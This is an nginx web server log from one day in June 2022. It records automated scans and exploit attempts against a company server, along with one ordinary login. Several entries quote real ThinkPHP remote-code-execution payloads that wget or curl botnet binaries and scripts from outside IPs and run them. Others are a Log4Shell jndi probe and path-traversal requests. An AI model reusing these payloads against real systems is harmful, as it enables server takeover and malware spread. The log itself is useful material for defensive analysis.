N G I N X
Jun 13 08:50:52 custom docker/nginx[1719]: 2022/06/13 08:50:52 [error] 113#0: 2812 open() “/etc/nginx/html/.env” failed (2: No such file or directory), client: 40.77.51.16, server: scm.ako-agrar.de, request: “GET /.env HTTP/1.1”, host: “88.99.191.43”
Jun 13 08:50:52 custom docker/nginx[1719]: 40.77.51.16 - - [13/Jun/2022:08:50:52 +0200] “GET /.env HTTP/1.1” 404 928 “-” “Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30” “-”
Jun 13 08:50:53 custom docker/nginx[1719]: 40.77.51.16 - - [13/Jun/2022:08:50:53 +0200] “POST / HTTP/1.1” 301 458 “-” “Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30” “-”
Jun 13 09:12:39 custom docker/nginx[1719]: 157.245.146.173 - - [13/Jun/2022:09:12:39 +0200] “GET / HTTP/1.1” 301 186 “-” “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36” “-”
Jun 13 09:12:40 custom docker/nginx[1719]: 139.59.24.206 - - [13/Jun/2022:09:12:40 +0200] “GET / HTTP/1.1” 301 458 “-” “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36” “-”
Jun 13 09:12:42 custom docker/nginx[1719]: 139.59.24.206 - - [13/Jun/2022:09:12:42 +0200] “GET /cockpit HTTP/1.1” 302 108 “-” “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36” “-”
Jun 13 09:12:43 custom docker/nginx[1719]: 139.59.24.206 - - [13/Jun/2022:09:12:43 +0200] “GET /cas/login?service=https%3A%2F%2Fscm.ako-agrar.de%2Fcockpit%2F HTTP/1.1” 200 4106 “-” “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36” “-”
Jun 13 09:31:05 custom docker/nginx[1719]: 112.27.237.161 - - [13/Jun/2022:09:31:05 +0200] “GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://194.31.98.17/bins/TropicalV1.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep’ HTTP/1.1” 400 174 “-” “Tsunami/2.0” “-”
Jun 13 09:35:00 custom docker/nginx[1719]: 2.56.56.71 - - [13/Jun/2022:09:35:00 +0200] “GET /.env HTTP/1.1” 301 186 “-” “Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36” “-”
Jun 13 09:35:00 custom docker/nginx[1719]: 2.56.56.71 - - [13/Jun/2022:09:35:00 +0200] “GET /sendgrid.env HTTP/1.1” 301 186 “-” “Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36” “-”
Jun 13 09:35:00 custom docker/nginx[1719]: 2.56.56.71 - - [13/Jun/2022:09:35:00 +0200] “GET /core/.env HTTP/1.1” 301 186 “-” “Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36” “-”
Jun 13 09:35:00 custom docker/nginx[1719]: 2.56.56.71 - - [13/Jun/2022:09:35:00 +0200] “GET /vendor/.env HTTP/1.1” 301 186 “-” “Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36” “-”
Jun 13 09:35:00 custom docker/nginx[1719]: 2.56.56.71 - - [13/Jun/2022:09:35:00 +0200] “GET /assets/.env HTTP/1.1” 301 186 “-” “Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36” “-”
Jun 13 09:35:00 custom docker/nginx[1719]: 2.56.56.71 - - [13/Jun/2022:09:35:00 +0200] “GET /storage/.env HTTP/1.1” 301 186 “-” “Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36” “-”
Jun 13 09:35:00 custom docker/nginx[1719]: 2.56.56.71 - - [13/Jun/2022:09:35:00 +0200] “GET /public/.env HTTP/1.1” 301 186 “-” “Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36” “-”
Jun 13 09:35:00 custom docker/nginx[1719]: 2.56.56.71 - - [13/Jun/2022:09:35:00 +0200] “GET /app/.env HTTP/1.1” 301 186 “-” “Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36” “-”
Jun 13 09:35:00 custom docker/nginx[1719]: 2.56.56.71 - - [13/Jun/2022:09:35:00 +0200] “GET /admin/.env HTTP/1.1” 301 186 “-” “Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36” “-”
Jun 13 09:35:00 custom docker/nginx[1719]: 2.56.56.71 - - [13/Jun/2022:09:35:00 +0200] “GET /laravel/.env HTTP/1.1” 301 186 “-” “Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36” “-”
Jun 13 09:35:01 custom docker/nginx[1719]: 2.56.56.71 - - [13/Jun/2022:09:35:01 +0200] “POST / HTTP/1.1” 301 186 “-” “Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36” “-”
Jun 13 09:35:01 custom docker/nginx[1719]: 2.56.56.71 - - [13/Jun/2022:09:35:01 +0200] “GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1” 301 186 “-” “Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36” “-”
Jun 13 09:35:27 custom docker/nginx[1719]: 167.94.138.61 - - [13/Jun/2022:09:35:27 +0200] “GET / HTTP/1.1” 301 186 “-” “-” “-”
Jun 13 09:35:27 custom docker/nginx[1719]: 167.94.138.61 - - [13/Jun/2022:09:35:27 +0200] “GET / HTTP/1.1” 301 186 “-” “Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)” “-”
Jun 13 09:35:28 custom docker/nginx[1719]: 167.94.138.61 - - [13/Jun/2022:09:35:28 +0200] “PRI * HTTP/2.0” 400 174 “-” “-” “-”
Jun 13 09:35:28 custom docker/nginx[1719]: 167.94.138.61 - - [13/Jun/2022:09:35:28 +0200] “GET / HTTP/1.1” 301 458 “-” “Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)” “-”
Jun 13 09:35:30 custom docker/nginx[1719]: 167.94.138.61 - - [13/Jun/2022:09:35:30 +0200] “GET /cockpit HTTP/1.1” 302 108 “-” “Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)” “-”
Jun 13 09:35:31 custom docker/nginx[1719]: 167.94.138.61 - - [13/Jun/2022:09:35:31 +0200] “GET /cas/login HTTP/1.1” 200 1347 “-” “Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)” “-”
Jun 13 09:37:18 custom docker/nginx[1719]: 115.202.6.140 - - [13/Jun/2022:09:37:18 +0200] “GET / HTTP/1.0” 301 446 “-” “-” “-”
Jun 13 09:37:19 custom docker/nginx[1719]: 115.202.6.140 - - [13/Jun/2022:09:37:19 +0200] “GET / HTTP/1.1” 301 458 “-” “Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4 240.111 Safari/537.36” “-”
Jun 13 09:37:19 custom docker/nginx[1719]: 115.202.6.140 - - [13/Jun/2022:09:37:19 +0200] “GET /cockpit HTTP/1.1” 302 108 “https://88.99.191.43” “Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4 240.111 Safari/537.36” “-”
Jun 13 09:37:21 custom docker/nginx[1719]: 115.202.6.140 - - [13/Jun/2022:09:37:21 +0200] “GET /cas/login?service=https%3A%2F%2Fscm.ako-agrar.de%2Fcockpit%2F HTTP/1.1” 200 1386 “https://88.99.191.43/cockpit” “Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4 240.111 Safari/537.36” “-”
Jun 13 09:51:18 custom docker/nginx[1719]: 47.98.112.175 - - [13/Jun/2022:09:51:18 +0200] “GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=‘wget http://160.20.145.225/bins/xxx.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp’ HTTP/1.1” 400 174 “-” “Uirusu/2.0” “-”
Jun 13 10:14:32 custom docker/nginx[1719]: 175.120.254.5 - - [13/Jun/2022:10:14:32 +0200] “GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=‘wget http://193.239.147.201/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp’ HTTP/1.1” 400 174 “-” “Uirusu/2.0” “-”
Jun 13 10:25:30 custom docker/nginx[1719]: 45.9.150.140 - - [13/Jun/2022:10:25:30 +0200] “GET /apiv4?{jndi:ldap://45.92.54.232/github/graphql} HTTP/1.1” 400 679 “-” “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36” “-”
Jun 13 10:25:30 custom docker/nginx[1719]: 2022/06/13 10:25:30 [warn] 113#0: 2868 using uninitialized “scripts” variable while reading client request headers, client: 45.9.150.140, server: scm.ako-agrar.de, request: “GET /apiv4?{jndi:ldap://45.92.54.232/github/graphql} HTTP/1.1”, host: “88.99.191.43”
Jun 13 10:34:36 custom docker/nginx[1719]: 95.9.33.200 - - [13/Jun/2022:10:34:36 +0200] “GET / HTTP/1.0” 301 446 “-” “-” “-”
Jun 13 11:22:17 custom docker/nginx[1719]: 134.122.112.12 - - [13/Jun/2022:11:22:17 +0200] "\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03\xDF\x1BI\x11p\xB0\xEB\x04\xC4\xB5,M\xBD\xA4\x80!\x97\xB8\xA2\xBB\xE6\x1C\x13\xA8\x19\xE4\x94u\xEA\x0C\xBB \xEF)\xC0\xF4\x80\xE3\xF7j\x9F\xF9E\xBC\x8Bq\xE8?\x87\x22\xD8\xAFo\xAE\x07\xDDo!\xAF\xBE\x5CT\xDE\xA1\x00&\xC0/\xC00\xC0+\xC0,\xCC\xA8\xCC\xA9\xC0\x13\xC0\x09\xC0\x14\xC0" 400 174 “-” “-” “-”
Jun 13 11:22:17 custom docker/nginx[1719]: 134.122.112.12 - - [13/Jun/2022:11:22:17 +0200] “GET / HTTP/1.1” 400 174 “-” “-” “-”
Jun 13 11:22:17 custom docker/nginx[1719]: 134.122.112.12 - - [13/Jun/2022:11:22:17 +0200] “GET / HTTP/1.1” 301 186 “-” “l9tcpid/v1.1.0” “-”
Jun 13 11:24:07 custom docker/nginx[1719]: 134.122.112.12 - - [13/Jun/2022:11:24:07 +0200] “PUT /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1” 301 186 “-” “Go-http-client/1.1” “-”
Jun 13 11:24:07 custom docker/nginx[1719]: 134.122.112.12 - - [13/Jun/2022:11:24:07 +0200] “HEAD /cgi-bin/blockpage.cgi HTTP/1.1” 301 0 “-” “Go-http-client/1.1” “-”
Jun 13 11:24:08 custom docker/nginx[1719]: 134.122.112.12 - - [13/Jun/2022:11:24:08 +0200] “CONNECT leakix.net:443 HTTP/1.1” 400 174 “-” “-” “-”
Jun 13 11:24:08 custom docker/nginx[1719]: 134.122.112.12 - - [13/Jun/2022:11:24:08 +0200] “GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts HTTP/1.1” 400 174 “-” “-” “-”
Jun 13 11:24:08 custom docker/nginx[1719]: 134.122.112.12 - - [13/Jun/2022:11:24:08 +0200] “GET /.DS_Store HTTP/1.1” 301 186 “-” “Go-http-client/1.1” “-”
Jun 13 11:24:09 custom docker/nginx[1719]: 134.122.112.12 - - [13/Jun/2022:11:24:09 +0200] “GET /api/search?folderIds=0 HTTP/1.1” 301 186 “-” “l9explore/1.3.0” “-”
Jun 13 11:25:45 custom docker/nginx[1719]: 45.155.126.211 - - [13/Jun/2022:11:25:45 +0200] “GET / HTTP/1.1” 301 186 “-” “Mozilla/5.0 (compatible; tchelebi/1.0; +http://tchelebi.io)” “-”
Jun 13 11:49:02 custom docker/nginx[1719]: 130.162.169.44 - - [13/Jun/2022:11:49:02 +0200] “GET /.env HTTP/1.1” 301 186 “-” “-” “-”
Jun 13 11:49:02 custom docker/nginx[1719]: 130.162.169.44 - - [13/Jun/2022:11:49:02 +0200] “GET /_profiler/phpinfo HTTP/1.1” 301 186 “-” “-” “-”
Jun 13 11:49:02 custom docker/nginx[1719]: 130.162.169.44 - - [13/Jun/2022:11:49:02 +0200] “GET /phpinfo HTTP/1.1” 301 186 “-” “-” “-”
Jun 13 11:49:03 custom docker/nginx[1719]: 130.162.169.44 - - [13/Jun/2022:11:49:03 +0200] “GET /phpinfo.php HTTP/1.1” 301 186 “-” “-” “-”
Jun 13 11:49:03 custom docker/nginx[1719]: 130.162.169.44 - - [13/Jun/2022:11:49:03 +0200] “GET /config HTTP/1.1” 301 186 “-” “-” “-”
Jun 13 11:49:04 custom docker/nginx[1719]: 130.162.169.44 - - [13/Jun/2022:11:49:04 +0200] “GET /config.json HTTP/1.1” 301 186 “-” “-” “-”
Jun 13 11:49:04 custom docker/nginx[1719]: 130.162.169.44 - - [13/Jun/2022:11:49:04 +0200] “GET /settings.json HTTP/1.1” 301 186 “-” “-” “-”
Jun 13 11:49:05 custom docker/nginx[1719]: 130.162.169.44 - - [13/Jun/2022:11:49:05 +0200] “GET /php.ini HTTP/1.1” 301 186 “-” “-” “-”
Jun 13 11:49:36 custom docker/nginx[1719]: 130.162.169.44 - - [13/Jun/2022:11:49:36 +0200] “GET /local.env HTTP/1.1” 301 186 “-” “-” “-”
Jun 13 11:49:46 custom docker/nginx[1719]: 130.162.169.44 - - [13/Jun/2022:11:49:46 +0200] “GET /export.env HTTP/1.1” 301 186 “-” “-” “-”
Jun 13 11:55:15 custom docker/nginx[1719]: 136.144.41.171 - - [13/Jun/2022:11:55:15 +0200] "\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03;\x12\xE9NZ\xC1\xC6g\xFFK\xE6\xC2\xA7\xD57\xC1\xAC\xA1\x15\xB6\x83y\xAE\xA2\x84\x10\x14\x14\xBE\x98i\xC0 J\x85\x90\xAF\xC2\xDA\x1D;\x90\xCFz’JpX\xC1Ia\xB5#l\xD1\x1D\xB4[\xAD\x1E\xF1t\xCBx\x00&\xC0+\xC0/\xC0,\xC00\xCC\xA9\xCC\xA8\xC0\x09\xC0\x13\xC0" 400 174 “-” “-” “-”
Jun 13 11:55:15 custom docker/nginx[1719]: 136.144.41.171 - - [13/Jun/2022:11:55:15 +0200] “GET / HTTP/1.1” 301 186 “-” “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.172 Safari/537.36 Vivaldi/2.5.1525.48” “-”
Jun 13 12:18:03 custom docker/nginx[1719]: 103.212.238.12 - - [13/Jun/2022:12:18:03 +0200] “GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1]=‘wget http://107.173.148.8/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp Tsunami.ThinkPHP ; rm -rf thinkphp’ HTTP/1.1” 400 174 “-” “Tsunami/2.0” “-”
Jun 13 12:27:54 custom docker/nginx[1719]: 185.248.22.98 - - [13/Jun/2022:12:27:54 +0200] “GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1]=‘wget http://193.239.147.201/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp’ HTTP/1.1” 400 174 “-” “Uirusu/2.0” “-”
Jun 13 12:49:02 custom docker/nginx[1719]: 2022/06/13 12:49:02 [error] 113#0: *2908 open() “/etc/nginx/html/remote/fgt_lang” failed (2: No such file or directory), client: 45.134.144.140, server: scm.ako-agrar.de, request: “GET ///remote/fgt_lang?lang=/…/…/…/…//////////dev/ HTTP/1.1”, host: “88.99.191.43”
Jun 13 12:49:02 custom docker/nginx[1719]: 45.134.144.140 - - [13/Jun/2022:12:49:02 +0200] “GET ///remote/fgt_lang?lang=/…/…/…/…//////////dev/ HTTP/1.1” 404 928 “-” “python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.el7.x86_64” “-”
Jun 13 12:49:57 custom docker/nginx[1719]: 20.214.140.152 - - [13/Jun/2022:12:49:57 +0200] “GET /.env HTTP/1.1” 301 186 “-” “Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30” “-”
Jun 13 12:49:58 custom docker/nginx[1719]: 20.214.140.152 - - [13/Jun/2022:12:49:58 +0200] “POST / HTTP/1.1” 301 186 “-” “Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30” “-”
Jun 13 12:50:00 custom docker/nginx[1719]: 20.214.140.152 - - [13/Jun/2022:12:50:00 +0200] “GET /.env HTTP/1.1” 404 928 “-” “Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30” “-”
Jun 13 12:50:00 custom docker/nginx[1719]: 2022/06/13 12:50:00 [error] 114#0: *2911 open() “/etc/nginx/html/.env” failed (2: No such file or directory), client: 20.214.140.152, server: scm.ako-agrar.de, request: “GET /.env HTTP/1.1”, host: “88.99.191.43”
Jun 13 12:50:01 custom docker/nginx[1719]: 20.214.140.152 - - [13/Jun/2022:12:50:01 +0200] “POST / HTTP/1.1” 301 458 “-” “Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30” “-”
Jun 13 13:00:52 custom docker/nginx[1719]: 20.78.0.40 - - [13/Jun/2022:13:00:52 +0200] “GET / HTTP/1.1” 301 186 “-” “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36” “-”
Jun 13 13:00:53 custom docker/nginx[1719]: 20.78.0.40 - - [13/Jun/2022:13:00:53 +0200] “” 400 0 “-” “-” “-”
Jun 13 13:06:57 custom docker/nginx[1719]: 5.150.232.254 - - [13/Jun/2022:13:06:57 +0200] “GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1]=’(curl 188.132.179.254/ldr.sh||wget -q -O- http://188.132.179.254/ldr.sh)|bash’ HTTP/1.1” 400 174 “-” “Uirusu/2.0” “-”
Jun 13 13:18:47 custom docker/nginx[1719]: 2.58.149.222 - - [13/Jun/2022:13:18:47 +0200] “POST /boaform/admin/formLogin HTTP/1.1” 301 186 “http://88.99.191.43:80/admin/login.asp” “Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0” “-”
Jun 13 13:18:47 custom docker/nginx[1719]: 2.58.149.222 - - [13/Jun/2022:13:18:47 +0200] “” 400 0 “-” “-” “-”
Jun 13 13:21:37 custom docker/nginx[1719]: 34.140.248.32 - - [13/Jun/2022:13:21:37 +0200] “GET / HTTP/1.1” 301 458 “-” “python-requests/2.28.0” “-”
Jun 13 13:45:41 custom docker/nginx[1719]: 217.170.185.146 - - [13/Jun/2022:13:45:41 +0200] “GET / HTTP/2.0” 301 446 “-” “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 Edg/102.0.1245.33” “-”
Jun 13 13:45:42 custom docker/nginx[1719]: 217.170.185.146 - - [13/Jun/2022:13:45:42 +0200] “GET /cockpit HTTP/2.0” 302 216 “-” “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 Edg/102.0.1245.33” “-”
Jun 13 13:45:42 custom docker/nginx[1719]: 217.170.185.146 - - [13/Jun/2022:13:45:42 +0200] “GET /cas/login?service=https%3A%2F%2Fscm.ako-agrar.de%2Fcockpit%2F HTTP/2.0” 200 1380 “-” “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 Edg/102.0.1245.33” “-”
Jun 13 13:45:42 custom docker/nginx[1719]: 217.170.185.146 - - [13/Jun/2022:13:45:42 +0200] “GET /cas/js/cas.js;jsessionid=1FBF8E3CCCAEA445DA5258E9016FDD66 HTTP/2.0” 200 825 “https://scm.ako-agrar.de/cas/login?service=https%3A%2F%2Fscm.ako-agrar.de%2Fcockpit%2F” “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 Edg/102.0.1245.33” “-”
Jun 13 13:45:42 custom docker/nginx[1719]: 217.170.185.146 - - [13/Jun/2022:13:45:42 +0200] “GET /cas/themes/ces-theme/dist/css/ces.css;jsessionid=1FBF8E3CCCAEA445DA5258E9016FDD66 HTTP/2.0” 200 22332 “https://scm.ako-agrar.de/cas/login?service=https%3A%2F%2Fscm.ako-agrar.de%2Fcockpit%2F” “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 Edg/102.0.1245.33” “-”
Jun 13 13:45:42 custom docker/nginx[1719]: 217.170.185.146 - - [13/Jun/2022:13:45:42 +0200] “GET /cas/style/custom.css;jsessionid=1FBF8E3CCCAEA445DA5258E9016FDD66 HTTP/2.0” 200 399 “https://scm.ako-agrar.de/cas/login?service=https%3A%2F%2Fscm.ako-agrar.de%2Fcockpit%2F” “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 Edg/102.0.1245.33” “-”
Jun 13 13:45:42 custom docker/nginx[1719]: 217.170.185.146 - - [13/Jun/2022:13:45:42 +0200] “GET /cas/themes/ces-theme/dist/images/logo/logo-white-160px.png;jsessionid=1FBF8E3CCCAEA445DA5258E9016FDD66 HTTP/2.0” 200 6314 “https://scm.ako-agrar.de/cas/login?service=https%3A%2F%2Fscm.ako-agrar.de%2Fcockpit%2F” “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 Edg/102.0.1245.33” “-”
Jun 13 13:45:42 custom docker/nginx[1719]: 217.170.185.146 - - [13/Jun/2022:13:45:42 +0200] “GET /warp/warp.js HTTP/2.0” 200 1632 “https://scm.ako-agrar.de/cas/login?service=https%3A%2F%2Fscm.ako-agrar.de%2Fcockpit%2F” “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 Edg/102.0.1245.33” “-”
Jun 13 13:45:42 custom docker/nginx[1719]: 217.170.185.146 - - [13/Jun/2022:13:45:42 +0200] “GET /warp/warp.css HTTP/2.0” 200 6381 “https://scm.ako-agrar.de/cas/login?service=https%3A%2F%2Fscm.ako-agrar.de%2Fcockpit%2F” “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 Edg/102.0.1245.33” “-”
Jun 13 13:45:42 custom docker/nginx[1719]: 217.170.185.146 - - [13/Jun/2022:13:45:42 +0200] “GET /warp/menu.json HTTP/2.0” 200 569 “https://scm.ako-agrar.de/cas/login?service=https%3A%2F%2Fscm.ako-agrar.de%2Fcockpit%2F” “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 Edg/102.0.1245.33” “-”
Jun 13 13:45:42 custom docker/nginx[1719]: 217.170.185.146 - - [13/Jun/2022:13:45:42 +0200] “GET /cas/themes/ces-theme/dist/images/favicon/favicon-16px.png;jsessionid=1FBF8E3CCCAEA445DA5258E9016FDD66 HTTP/2.0” 200 459 “https://scm.ako-agrar.de/cas/login?service=https%3A%2F%2Fscm.ako-agrar.de%2Fcockpit%2F” “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 Edg/102.0.1245.33” “-”
Jun 13 13:45:56 custom docker/nginx[1719]: 217.170.185.146 - - [13/Jun/2022:13:45:56 +0200] “POST /cas/login;jsessionid=1FBF8E3CCCAEA445DA5258E9016FDD66?service=https%3A%2F%2Fscm.ako-agrar.de%2Fcockpit%2F HTTP/2.0” 302 0 “https://scm.ako-agrar.de/cas/login?service=https%3A%2F%2Fscm.ako-agrar.de%2Fcockpit%2F” “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 Edg/102.0.1245.33” “-”
Jun 13 13:45:56 custom docker/nginx[1719]: 88.99.191.43 - - [13/Jun/2022:13:45:56 +0200] “GET /cas/p3/serviceValidate?service=https%3A%2F%2Fscm.ako-agrar.de%2Fcockpit%2F&ticket=ST-18-y9zhbgpg4Wpr0egrhoND-cas.ces.local&pgtUrl=https%3A%2F%2Fscm.ako-agrar.de%2Fcockpit%2Fapi%2Fv1%2FpgtCallback HTTP/1.1” 200 301 “-” “-” “-”
Jun 13 13:45:56 custom docker/nginx[1719]: 217.170.185.146 - - [13/Jun/2022:13:45:56 +0200] “GET /cockpit/?ticket=ST-18-y9zhbgpg4Wpr0egrhoND-cas.ces.local HTTP/2.0” 401 12 “https://scm.ako-agrar.de/cas/login?service=https%3A%2F%2Fscm.ako-agrar.de%2Fcockpit%2F” “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 Edg/102.0.1245.33” “-”
Jun 13 13:45:56 custom docker/nginx[1719]: 2022/06/13 13:45:56 [error] 113#0: *2919 open() “/etc/nginx/html/favicon.ico” failed (2: No such file or directory), client: 217.170.185.146, server: scm.ako-agrar.de, request: “GET /favicon.ico HTTP/2.0”, host: “scm.ako-agrar.de”, referrer: “https://scm.ako-agrar.de/cockpit/?ticket=ST-18-y9zhbgpg4Wpr0egrhoND-cas.ces.local”
Jun 13 13:45:56 custom docker/nginx[1719]: 217.170.185.146 - - [13/Jun/2022:13:45:56 +0200] “GET /favicon.ico HTTP/2.0” 404 916 “https://scm.ako-agrar.de/cockpit/?ticket=ST-18-y9zhbgpg4Wpr0egrhoND-cas.ces.local” “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 Edg/102.0.1245.33” “-”
Jun 13 13:50:14 custom docker/nginx[1719]: 217.170.185.146 - - [13/Jun/2022:13:50:14 +0200] “GET /cockpit HTTP/2.0” 302 216 “-” “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 Edg/102.0.1245.39” “-”
Jun 13 13:50:14 custom docker/nginx[1719]: 217.170.185.146 - - [13/Jun/2022:13:50:14 +0200] “GET /cas/login?service=https%3A%2F%2Fscm.ako-agrar.de%2Fcockpit%2F HTTP/2.0” 200 1376 “-” “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 Edg/102.0.1245.39” “-”
